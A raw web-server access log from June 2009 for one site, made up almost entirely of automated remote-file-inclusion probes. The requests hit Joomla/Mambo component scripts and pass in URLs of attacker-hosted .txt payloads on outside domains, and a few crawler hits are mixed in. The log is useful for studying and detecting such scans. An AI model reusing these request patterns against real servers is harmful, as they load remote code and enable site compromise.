77.240.235.130 - - [12/Jun/2009:17:03:10 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:17:03:50 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:17:03:50 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:17:03:50 -0700] "GET /logs/access_070912.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:17:03:58 -0700] "GET /logs/access_071012.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
222.122.160.145 - - [12/Jun/2009:17:09:37 -0700] "GET /logs//?mosConfig_absolute_path=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 200 6806 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.projectpr.com"
222.122.160.145 - - [12/Jun/2009:17:09:37 -0700] "GET /?mosConfig_absolute_path=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 200 9405 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.projectpr.com"
74.6.22.163 - - [12/Jun/2009:17:14:24 -0700] "GET /clipart/buttons/?M=A HTTP/1.0" 200 670 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
125.137.191.115 - - [12/Jun/2009:17:37:07 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [12/Jun/2009:17:37:07 -0700] "GET //administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [12/Jun/2009:17:37:07 -0700] "GET /logs///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [12/Jun/2009:17:44:00 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:17:50:44 -0700] "GET /logs/access_070912.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:17:51:08 -0700] "GET /logs/access_071012.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:17:55:43 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:17:55:43 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:17:55:43 -0700] "GET /logs/access_070812.log//components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:17:55:47 -0700] "GET /logs/access_071012.log//components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
123.242.165.138 - - [12/Jun/2009:17:58:14 -0700] "GET /logs/access_071112.log//administrator/includes/admin.php?mosConfig_absolute_path=http://www.portalwebfree.xpg.com.br/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:01:45 -0700] "GET /logs/access_070812.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:01:49 -0700] "GET /logs/access_071012.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
89.38.128.43 - - [12/Jun/2009:18:03:35 -0700] "GET /logs/access_071212.log/index.php?pagina=http://poool00.cfun.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
89.38.128.43 - - [12/Jun/2009:18:03:36 -0700] "GET /index.php?pagina=http://poool00.cfun.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
89.38.128.43 - - [12/Jun/2009:18:03:36 -0700] "GET /logs/index.php?pagina=http://poool00.cfun.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
89.38.128.43 - - [12/Jun/2009:18:03:36 -0700] "GET /logs/access_071212.log/index.php?pagina=http://poool00.cfun.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
89.38.128.43 - - [12/Jun/2009:18:03:37 -0700] "GET /index.php?pagina=http://poool00.cfun.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
89.38.128.43 - - [12/Jun/2009:18:03:37 -0700] "GET /logs/index.php?pagina=http://poool00.cfun.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
72.3.238.6 - - [12/Jun/2009:18:10:42 -0700] "GET /index.php?pagina=http://poool00.cfun.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
72.3.238.6 - - [12/Jun/2009:18:10:42 -0700] "GET /logs/access_071212.log/index.php?pagina=http://poool00.cfun.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
72.3.238.6 - - [12/Jun/2009:18:10:47 -0700] "GET /logs/index.php?pagina=http://poool00.cfun.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
72.3.238.6 - - [12/Jun/2009:18:11:43 -0700] "GET /logs/access_071212.log/index.php?pagina=http://poool00.cfun.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
72.3.238.6 - - [12/Jun/2009:18:11:43 -0700] "GET /logs/index.php?pagina=http://poool00.cfun.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
72.3.238.6 - - [12/Jun/2009:18:11:43 -0700] "GET /index.php?pagina=http://poool00.cfun.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:13:41 -0700] "GET /logs/access_070912.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:13:41 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:13:41 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:18:14:47 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:18:14:47 -0700] "GET /logs/access_070912.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:18:14:47 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:15:03 -0700] "GET /logs/access_070812.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:18:15:09 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:18:15:09 -0700] "GET /logs/access_070912.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:18:15:09 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:15:43 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:15:43 -0700] "GET /logs/access_070812.log//components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:15:43 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:15:47 -0700] "GET /logs/access_071012.log//components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:18:16:10 -0700] "GET /logs/access_071012.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:18:16:59 -0700] "GET /logs/access_071012.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:18:46 -0700] "GET /logs/access_070912.log//components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:18:52 -0700] "GET /logs/access_070812.log//components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:20:38 -0700] "GET /logs/access_070812.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:20:38 -0700] "GET /logs/access_071012.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:25:40 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:25:40 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:25:40 -0700] "GET /logs/access_070812.log//components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:25:45 -0700] "GET /logs/access_071012.log//components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:30:35 -0700] "GET /logs/access_070812.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:30:35 -0700] "GET /logs/access_071012.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
72.3.238.6 - - [12/Jun/2009:18:36:38 -0700] "GET /index.php?pagina=http://poool00.cfun.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
72.3.238.6 - - [12/Jun/2009:18:36:38 -0700] "GET /logs/index.php?pagina=http://poool00.cfun.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
72.3.238.6 - - [12/Jun/2009:18:36:43 -0700] "GET /logs/access_071212.log/index.php?pagina=http://poool00.cfun.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
200.103.16.12 - - [12/Jun/2009:18:50:58 -0700] "GET /index.php?pagina=http://www.votaya.com//pics/site/image?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
118.129.166.10 - - [12/Jun/2009:18:52:06 -0700] "GET /logs///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
118.129.166.10 - - [12/Jun/2009:18:52:06 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
118.129.166.10 - - [12/Jun/2009:18:52:08 -0700] "GET //administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:56:25 -0700] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:56:25 -0700] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:18:56:25 -0700] "GET /logs/access_070812.log//components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:19:00:05 -0700] "GET /logs/access_070812.log%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.6.22.163 - - [12/Jun/2009:19:08:10 -0700] "GET /clipart/backgrounds/ HTTP/1.0" 200 680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:19:16:46 -0700] "GET /logs/access_070812.log//components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:19:16:46 -0700] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:19:16:46 -0700] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:19:17:05 -0700] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:19:17:05 -0700] "GET /logs/access_070812.log//components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:19:17:05 -0700] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.6.22.163 - - [12/Jun/2009:19:17:07 -0700] "GET /clipart/backgrounds/?M=A HTTP/1.0" 200 680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:19:17:37 -0700] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:19:17:37 -0700] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:19:17:37 -0700] "GET /logs/access_070812.log//components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:19:19:16 -0700] "GET /logs/access_070812.log%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:19:20:00 -0700] "GET /logs/access_070812.log%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
64.6.15.41 - - [12/Jun/2009:19:22:32 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
64.6.15.41 - - [12/Jun/2009:19:22:32 -0700] "GET /logs/access_070812.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
64.6.15.41 - - [12/Jun/2009:19:22:32 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
64.6.15.41 - - [12/Jun/2009:19:22:40 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
64.6.15.41 - - [12/Jun/2009:19:22:40 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
64.6.15.41 - - [12/Jun/2009:19:22:40 -0700] "GET /logs/access_070812.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
64.6.15.41 - - [12/Jun/2009:19:22:43 -0700] "GET /logs/access_071012.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
64.6.15.41 - - [12/Jun/2009:19:22:52 -0700] "GET /logs/access_071012.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:19:23:02 -0700] "GET /logs/access_070812.log%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:19:23:03 -0700] "GET /logs/access_070612.log%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
64.6.15.41 - - [12/Jun/2009:19:23:19 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
64.6.15.41 - - [12/Jun/2009:19:23:19 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
64.6.15.41 - - [12/Jun/2009:19:23:19 -0700] "GET /logs/access_070812.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:19:23:26 -0700] "GET /logs/access_070612.log%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
64.6.15.41 - - [12/Jun/2009:19:23:31 -0700] "GET /logs/access_071012.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:19:26:36 -0700] "GET /logs/access_070612.log%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:19:26:59 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:19:26:59 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:19:26:59 -0700] "GET /logs/access_070812.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:19:27:04 -0700] "GET /logs/access_070912.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:19:27:39 -0700] "GET /logs/access_071212.log//components/com_smf/smf.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:19:27:55 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:19:27:55 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:19:27:55 -0700] "GET /logs/access_070812.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:19:28:32 -0700] "GET /logs/access_070912.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:19:29:10 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:19:29:11 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:19:29:11 -0700] "GET /logs/access_070812.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:19:29:38 -0700] "GET /logs/access_070912.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:19:30:02 -0700] "GET /logs/access_070812.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:19:30:02 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:19:30:02 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
